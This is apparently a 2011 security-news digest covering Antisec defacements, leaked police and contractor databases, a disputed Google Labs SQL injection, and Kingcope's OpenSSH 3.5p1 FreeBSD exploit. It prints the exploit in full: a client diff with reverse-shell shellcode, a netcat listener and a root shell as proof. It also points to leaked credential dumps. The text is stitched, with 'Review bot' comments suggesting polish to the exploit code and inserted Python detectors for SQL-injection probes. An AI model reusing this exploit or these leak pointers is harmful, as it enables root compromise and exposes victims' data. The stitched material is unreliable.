The Hackers News



Official Website of Amy Winehouse - Singer/Songwriter Defaced by #Antisec

Posted: 01 Jul 2011 12:33 AM PDT

Official Website of Amy Winehouse - Singer/Songwriter Defaced by #Antisec
Amy Jade Winehouse's official website, http://www.amywinehouse.com/, has been defaced by Anonymous hackers for #Antisec.


Amy Jade Winehouse (born 14 September 1983) is an English singer-songwriter, known for her powerful contralto vocals and her eclectic mix of various musical genres including R&B, soul, and jazz. She has received publicity over her substance abuse and mental health issues.


Related hack: Meggitt - US Military and Law Enforcement equipment supplier hacked for #Antisec (see the next post)

Meggitt - US Military and Law Enforcement equipment supplier hacked for #Antisec

Posted: 01 Jul 2011 12:20 AM PDT

Meggitt Database Hacked - US Military and Law Enforcement equipment supplier hacked for #Antisec


The database of www.meggitttrainingsystems.com, a US military and law enforcement equipment supplier, has been hacked and exposed by Anonymous (The Bash Crew).


Hackers said: "People of the USA, your government puts their trust and your money into these people, and we got into their database using a google dork and a simple sql injection. Anyway, we hope this will cause many lulz, at least in spamming heads of the corps and government that choose such a poorly secured site."


Vulnerable link: http://www.meggitttrainingsystems.com/main.php?id=119

Hackers released the database on Pastebin: http://pastebin.com/0r4A9DVR

Mesa Arizona Fraternal Order of Police website hacked, Data exposed !

Posted: 30 Jun 2011 09:23 PM PDT

Mesa Arizona Fraternal Order of Police website hacked, Data exposed !
Anonymous hackers have defaced the Mesa, Arizona Fraternal Order of Police website, http://mesafop.com/. This hack was done for Operation Antisec.


They posted a message and all the data of Arizona police on the defaced page. Alternatively, you can read the written part at http://pastebin.com/RakyZgJE.


Hackers claim to have defaced the following domains:
azfop.com, azfop78.com, azfop5.com, tucsonfop.com, mesafop.com, azfop32.com, azfop50.com, azfop44.com, azfop62.com, azfop58.com


The hackers exposed credit card details and email addresses/passwords of many officers.
Not only this, they also exposed the usernames and passwords of 1200 FOP members on the defaced page.

SQL Injection Vulnerability in Google Lab Database System

Posted: 01 Jul 2011 12:41 AM PDT


SQL Injection Vulnerability in Google Lab Database System

A very big and critical vulnerability has been reported in the Google Labs system. The hackers say they had already reported it to the vendor, but that no positive step was taken, so they finally disclosed the vulnerability publicly: Bangladesh Cyber Army admin Shadman Tanjim posted it on their forum.

The Google Labs website is said to have a SQL injection vulnerability, and the dangerous thing is that it is exploitable: the hackers were able to get tables, columns and data from the database. Google Labs has its own customised DB system, but the interesting thing is that its database behaves like an MS Access database, so MS Access SQL injection techniques also work on the Google Labs database system.

Statement By Hacker :

I have already contacted Google Corporation but they didn't give a positive response. I think this is their big fault, and they will suffer for that. But if they give a positive response then this will be very good for them. Thanks a ton!!!
Shadman Tanjim
Ethical Hacker, Programmer and Security Professional
Email: admin@bdcyberarmy.com or shadman2600@gmail.com
Website: www.bdcyberarmy.com/forum
Greets to: Shahee Mirza, Almas Zaman, Sayem Islam, Pudina pata, LuckyFm and All
Bangladesh Cyber Army Members.


Video Download link:
http://www.bdcyberarmy.com/Google/google_video.avi

The hackers released step-by-step proof of this vulnerability:
1. Website: www.googlelabs.com or labs.google.com
2. Vulnerability type: SQL Injection
3. Vulnerable URL: http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer

Let's check the exploitation of this vulnerable link. The hackers used three well-known SQL injection tools:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool

1st, with the Havij Advanced SQL Injection Tool:
Screenshot 1: Scanning the vulnerable link; the tool says this website is vulnerable.

Screenshot 2: Now it scans and gets all tables and columns.

Screenshot 3: Now you can see the list of tables and columns.

And this is proof that this website is genuinely SQL injection vulnerable. Here you can see the database type shown as MS Access, so this is a proof of concept. Some people may say the Google Labs database system is not MS Access, but this website's database behaves like an MS Access database, and MS Access SQL injection queries also work on the Google Labs database system, just as MySQL 5 and MySQL 4.1 are both injected via UNION SELECT even though not both have an information_schema.

2nd, with Safe3 SQL Injector v8.4:
Screenshot 1: Analysing the vulnerable link; it says it is vulnerable and gets the keyword and DB type.

Screenshot 2: Now it injects the vulnerable link and gets the full table list and column list.

This is another proof of this website's vulnerability, and the dangerous thing is that it is exploitable. Now we check our last SQL injection tool to be 100% satisfied.

3rd, the Pangolin SQL Injection Tool:
Screenshot 1: Scanning the vulnerable link; it says this website is vulnerable.

Screenshot 2: Now it injects this website and gets the tables and columns list.

Screenshot 3: Here is the full list of tables and columns.

Now I think we are 100% sure the Google Labs website is SQL injection vulnerable.

You can check the video. This video was also made by Bangladesh Cyber Army member Shadman Tanjim.

UPDATE : 
Google insists that there has been no intrusion. The company claims that its GQL database does not allow SQL injection attacks. Additionally, it says that the data that appears in the screenshots does not exist anywhere in its data stores.


In response, Shadman Tanjim replied to Google: "Prove it, because I have also proved it's vulnerable. If they say Google Labs is not vulnerable, it means we have found new bugs in some famous SQL injection tools, and also in the 'and 1=1' concept. So tell them to prove this; I don't think all the tools are false, because 1 tool can be false, 2 tools can be false, but not all. ALL tools say it is vulnerable, so I don't think there is any confusion. :D"
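The Meggitt post above (`main.php?id=119`, an integer parameter) and this one (`?q=%27`, a quote probe, followed by tools that test `and 1=1`-style conditions) describe the same kind of probing as seen from the server side. The following Python is an added example, not code from The Hacker News or from any party in these stories: it parses constructed access-log lines carrying those request paths and flags the probe patterns a defender would want alerted on, giving extra weight to a true/false boolean pair from one client.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined-log style); the request paths mirror
# the vulnerable URLs quoted in the Meggitt and Google Labs posts above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jul/2011:08:00:01 +0000] "GET /main.php?id=119 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jul/2011:08:00:02 +0000] "GET /main.php?id=119%27 HTTP/1.1" 500 312
10.0.0.5 - - [01/Jul/2011:08:00:03 +0000] "GET /main.php?id=119+and+1%3D1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jul/2011:08:00:04 +0000] "GET /main.php?id=119+and+1%3D2 HTTP/1.1" 200 98
10.0.0.9 - - [01/Jul/2011:08:01:00 +0000] "GET /?q=%27&apps=Search+Labs HTTP/1.1" 200 2048
10.0.0.9 - - [01/Jul/2011:08:01:01 +0000] "GET /?q=1+union+select+1,2,3&apps=Search+Labs HTTP/1.1" 200 2048
10.0.0.7 - - [01/Jul/2011:08:02:00 +0000] "GET /?q=rock+and+roll HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Probe signatures applied to each URL-decoded parameter value.
SIGNATURES = [
    ("quote-probe", re.compile(r"^\s*\d*\s*'\s*$|'\s*(--|#|$)")),       # id=119'  or  q='
    ("boolean-probe", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),  # and 1=1 / and 1=2
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),  # union select 1,2,3
]


def classify_param(value):
    """Return the names of every signature that matches one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(value)]


def scan_access_log(text):
    """Return one finding per (request, parameter) whose decoded value matches a signature."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("path"))
        # parse_qsl undoes percent-encoding and '+', so %27 -> ' and 1%3D1 -> 1=1
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            tags = classify_param(value)
            if tags:
                findings.append({"ip": m.group("ip"), "path": parts.path, "param": key,
                                 "value": value, "status": int(m.group("status")), "tags": tags})
    return findings


def hosts_with_boolean_pairs(findings):
    """Boolean-based probing shows up as one client sending at least two different
    conditions (a true and a false one) against the same parameter; that pair is far
    stronger evidence than a lone quote, so report those source IPs separately."""
    seen = {}
    for f in findings:
        if "boolean-probe" in f["tags"]:
            seen.setdefault((f["ip"], f["path"], f["param"]), set()).add(f["value"])
    return sorted({ip for (ip, _, _), values in seen.items() if len(values) >= 2})


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']!r} -> {', '.join(f['tags'])}")
    print("boolean-pair sources:", hosts_with_boolean_pairs(hits))
```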

MasterCard downed by ISP, not Anonymous hackers

Posted: 30 Jun 2011 09:20 AM PDT

MasterCard downed by ISP, not Anonymous hackers


Two days ago, Anonymous declared via Twitter that MasterCard was again down due to a DDoS attack in support of WikiLeaks and Anonymous. It was shortly after MasterCard went down that someone on Twitter, known as ibomhacktivist, promoted "MasterCard.com DOWN!!!", adding that the site was down for messing with WikiLeaks and Anonymous.

But in fact, MasterCard.com was simply offline, and shortly after the outage was noticed by the public, someone on Twitter claimed credit. In a statement, MasterCard blamed the outage on an ISP issue, without ruling out that they were attacked upstream.

"MasterCard's corporate, public-facing Website experienced intermittent service disruption, due to a telecommunications/Internet Service Provider outage that impacted multiple users. It is important to note that no cardholder data has been impacted and that cardholders can continue to use their cards securely. We are continuing to monitor the situation closely," spokeswoman Jennifer Stalzer said in an email to the media.

Indonesian and Australian police launched Cyber Crime Investigation Center

Posted: 30 Jun 2011 09:00 AM PDT

Indonesian and Australian police launched Cyber Crime Investigation Center

Indonesian and Australian police officially launched a joint project called the Cyber Crime Investigation Center. The center was officiated by Indonesian National Police chief Gen. Timur Pradopo and Australian Federal Police chief Comr. Tony Negus at the National Police Headquarters in Jakarta on Thursday.
Timur said the center had been in planning for six months.

"Today, we launch the center, which will be equipped with tools needed to carry out cyber crime investigation," Timur said, adding that its communication technology equipment was being provided by the Australian government. "Of course, this [center] will improve our capacity to detect and [investigate cyber] crimes, particularly transnational crimes," he said.

Negus said the center would allow the Indonesian National Police to deal with technology and IT-related crimes. He added that the Australian police force was looking to forge cooperative agreements in its investigation of transnational crimes, not only in the region but also across the world.

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Posted: 30 Jun 2011 08:10 AM PDT

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD


An OpenSSH 3.5p1 remote root exploit for FreeBSD has been shared by kcope on Twitter. The release note is given below:



OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
Discovered and Exploited By Kingcope
Year 2011
--

The last two days I have been investigating a vulnerability in OpenSSH
affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run
OpenSSH 3.5p1 in the default install.

The sshd banner for 4.11-RELEASE is "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".

A working Remote Exploit which spawns a root shell remotely and
prior to authentication was developed.

The bug can be triggered both through ssh version 1 and ssh version 2
using a modified ssh client. During the investigation of the vulnerability it was found that
the bug resides in the source code file "auth2-pam-freebsd.c".

http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c

This file does not exist in FreeBSD releases greater than 5.2.1. The last commit
is from 7 years ago.

Specifically the bug follows a code path in the PAM Authentication Thread inside this
source code, "pam_thread()". It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.

Both the challenge response (ssh version 1) and keyboard interactive via pam
(ssh version 2) authentications go through this code path.

By supplying a long username to the daemon the sshd crashes.

h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1

root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138

h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)

Looking into the coredump reveals:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0 0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305: (bad)

The sshd crashes at a place with illegal instructions. It looks like it depends
on how the sshd is started. Starting the sshd from the console as root and running
the ssh client with a long username again reveals:

h4x# killall -9 sshd
h4x# /usr/sbin/sshd

root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) x/10i $eip
0x41414141: Cannot access memory at address 0x41414141.

As you can see in the above gdb output we can control EIP completely.
If someone finds out on what this behaviour depends, especially why EIP can
be controlled when starting sshd in the console and can not be easily controlled
when being run from the boot sequence, please drop me an email at
isowarez.isowarez.isowarez@googlemail.com.

Anyhow this procedure shows that the sshd can be exploited because the instruction
pointer can be fully controlled.

The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client.
Using a reverse shellcode it will spawn a rootshell.

Only one offset is needed, the position of the shellcode can be found the following way:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0 0x41414141 in ?? ()
(gdb) set $x=0x08071000
(gdb) while(*++$x!=0x90909090)
>end
(gdb) x/10b $x

The printed address is the beginning of the shellcode nopsled.

Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.

It roughly does the following:

root@debian:~# ./ssh -1 192.168.32.138

root@debian:~# nc -v -l -p 10000
listening on [any] 10000 ...
192.168.32.138: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038
uname -a;id;
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005 root@perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
uid=0(root) gid=0(wheel) groups=0(wheel)

--

root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
> // Connect Back Shellcode
>
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
>
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
>
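Review bot: the comments on the two address pushes in hunk 667a668,717 do not match the defines they reference: `"\x68"IPADDR // push dword 0101017fh` annotates a 127.1.1.1 literal while `#define IPADDR "\xc0\xa8\x20\x80"` is 192.168.32.128, and `"\x66\x68"PORT // push word 4135` names a different port than `#define PORT "\x27\x10" /* htons(10000) */`; update both so the listing documents the constants actually compiled in. The line `"\xb0\xc4\x34\xff"` is also the only byte sequence in the block without a comment; state what it encodes, as every other line does.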
679a730,737
> char buffer[8096];
>
> // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
> memcpy(buffer, "AAAA\x58\xd8\x07\x08""CCCCDDDDEEEE\xd8\xd8\x07\x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);
> memset(buffer+24, '\x90', 5000);
> memcpy(buffer+24+5000, sc, sizeof(sc));
> server_user=buffer;
>
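Review bot: in `memcpy(buffer, "AAAA\x58\xd8\x07\x08""CCCCDDDDEEEE\xd8\xd8\x07\x08""GGGG...", 24);` only the first 24 bytes of the literal are copied, so everything from `GGGG` onward is dead text that suggests a larger write than actually happens; trim the literal to the bytes used, or derive the length from the literal with `sizeof`, so the two cannot drift apart. The comment `// Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1` should also say which of the two embedded 0x0807xxxx values is the offset it refers to, since a reader cannot tell from the code.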
690a749
>
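Review bot: hunk 690a749 adds only a blank line, so it is whitespace noise in the patch; drop it so the diff contains just the two substantive hunks.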

Cheers,

Kingcope
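The crash signature quoted in the advisory, `pid 160 (sshd), uid 0: exited on signal 11 (core dumped)`, is something a defender can watch for in /var/log/messages whether or not a given attempt succeeds. The following Python is an added example and not part of Kingcope's note: it parses constructed FreeBSD-style kernel log lines (hostname, PIDs and times are made up) and raises an alert when a uid-0 sshd segfaults repeatedly inside a short window.

```python
import re
from datetime import datetime

# Constructed excerpt in the FreeBSD 4.x /var/log/messages format. The sshd lines
# copy the shape of the record quoted in the advisory; host and PIDs are made up.
SAMPLE_MESSAGES = """\
Jun 30 15:58:02 h4x sshd[152]: Accepted publickey for ops from 192.168.32.10 port 40122 ssh2
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)
Jun 30 16:01:26 h4x /kernel: pid 163 (sshd), uid 0: exited on signal 11 (core dumped)
Jun 30 16:01:40 h4x /kernel: pid 171 (sshd), uid 0: exited on signal 11 (core dumped)
Jun 30 16:05:00 h4x /kernel: pid 180 (httpd), uid 80: exited on signal 11 (core dumped)
Jun 30 16:30:00 h4x /kernel: pid 190 (sshd), uid 0: exited on signal 11 (core dumped)
"""

CRASH_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) /kernel: "
    r"pid (?P<pid>\d+) \((?P<proc>[^)]+)\), uid (?P<uid>\d+): exited on signal (?P<sig>\d+)"
)


def parse_crashes(text, year=2011):
    """Return (timestamp, host, process, uid, signal, pid) for each kernel exit-on-signal
    record. syslog lines carry no year, so the caller supplies it (an assumption here)."""
    crashes = []
    for line in text.splitlines():
        m = CRASH_RE.match(line)
        if not m:
            continue  # ordinary sshd/auth lines and other noise are skipped
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        crashes.append((ts, m.group("host"), m.group("proc"),
                        int(m.group("uid")), int(m.group("sig")), int(m.group("pid"))))
    return crashes


def privileged_crash_bursts(crashes, proc="sshd", signal=11, window_s=60, threshold=2):
    """Flag each host where a uid-0 `proc` died on `signal` at least `threshold` times
    within `window_s` seconds. Repeated pre-auth sshd segfaults are the visible footprint
    of someone exercising the bug described above, whether or not a shell resulted.
    Returns one (host, first_crash_in_window, count) per host, earliest window only."""
    by_host = {}
    for ts, host, p, uid, sig, _ in crashes:
        if p == proc and uid == 0 and sig == signal:
            by_host.setdefault(host, []).append(ts)
    alerts = []
    for host, times in sorted(by_host.items()):
        times.sort()
        for i, start in enumerate(times):
            n = sum(1 for t in times[i:] if (t - start).total_seconds() <= window_s)
            if n >= threshold:
                alerts.append((host, start, n))
                break
    return alerts


if __name__ == "__main__":
    for host, start, n in privileged_crash_bursts(parse_crashes(SAMPLE_MESSAGES)):
        print(f"ALERT {host}: {n} root sshd SIGSEGV crashes starting {start:%b %d %H:%M:%S}")
```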

Mobius Forensic Toolkit v0.5.8 Released

Posted: 30 Jun 2011 08:05 AM PDT

Mobius Forensic Toolkit v0.5.8 Released

Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tools.

Change Log :

  • The Hive (registry viewer) features three new reports: email accounts, TCP/IP interfaces, and computer descriptions.
  • All registry reports can be exported as CSV, and the user password report can also be exported in a format suitable for John the Ripper.
  • Minor improvements were made.

Installation

As root, type:
python setup.py install

Usage

Run mobius_bin.py.


TDSS rootkit infects 1.5 million US computers

Posted: 30 Jun 2011 07:56 AM PDT

TDSS rootkit infects 1.5 million US computers

Millions of PCs around the world have been infected by the dangerous TDSS 'super-malware' rootkit as part of a campaign to build a giant new botnet, according to a report by researchers from security firm Kaspersky Lab.

TDSS is also known as 'TDL' and sometimes by its infamous rootkit component, Alureon. It has grown into a multi-faceted malware nexus, spinning out ever more complex and dangerous elements as it evolves.

Kaspersky Lab researchers were able to penetrate three SQL-based command and control (C&C) servers used to control the activities of the malware's latest version, TDL-4, where they discovered the IP addresses of 4.5 million PCs infected by the malware in 2011 alone. Almost 1.5 million of these were in the US. If active, this number of compromised computers could make it one of the largest botnets in the world, with the US portion alone worth an estimated $250,000 (£155,000) to the underground economy.

The researchers noticed a kad.dll component of the infection which appears to give TDSS/TDL-4 an elaborate C&C channel for controlling bots over the Kad P2P file exchange network, even if the primary encrypted channel has been shut down by rival botnet operators or security companies.

"We don't doubt that the development of TDSS will continue," said Kaspersky researcher, Sergey Golovanov, who performed the latest analysis of TDSS. "Active reworkings of TDL-4 code, rootkits for 64-bit systems, the use of P2P technologies, proprietary anti-virus and much more make the TDSS malicious program one of the most technologically developed and most difficult to analyse."

FBI searches LulzSec suspect's home in Hamilton, Ohio

Posted: 30 Jun 2011 07:39 AM PDT

FBI searches LulzSec suspect's home in Hamilton, Ohio
The investigation into the LulzSec hacking team continues, with news that FBI agents have searched a house in Hamilton, Ohio. The FBI investigation is believed to have been fuelled by interviews with Ryan Cleary, but did not lead to charges.


Federal agents are said to have searched a teenager's home in Jackson Road, Hamilton on Monday 27 June, although no-one was charged after the search warrant was served.


The Ohio teenager was known within LulzSec as "m_nerva", who leaked text logs of discussions within the group after it had hacked into the website of an FBI affiliate at the beginning of June.


After that, m_nerva's address was listed by LulzSec as being in Hamilton, Ohio.
Last week FBI agents searched the house of a woman in Iowa and questioned her about links with the group. LulzSec said in a statement that it had six members, though it never stated their gender.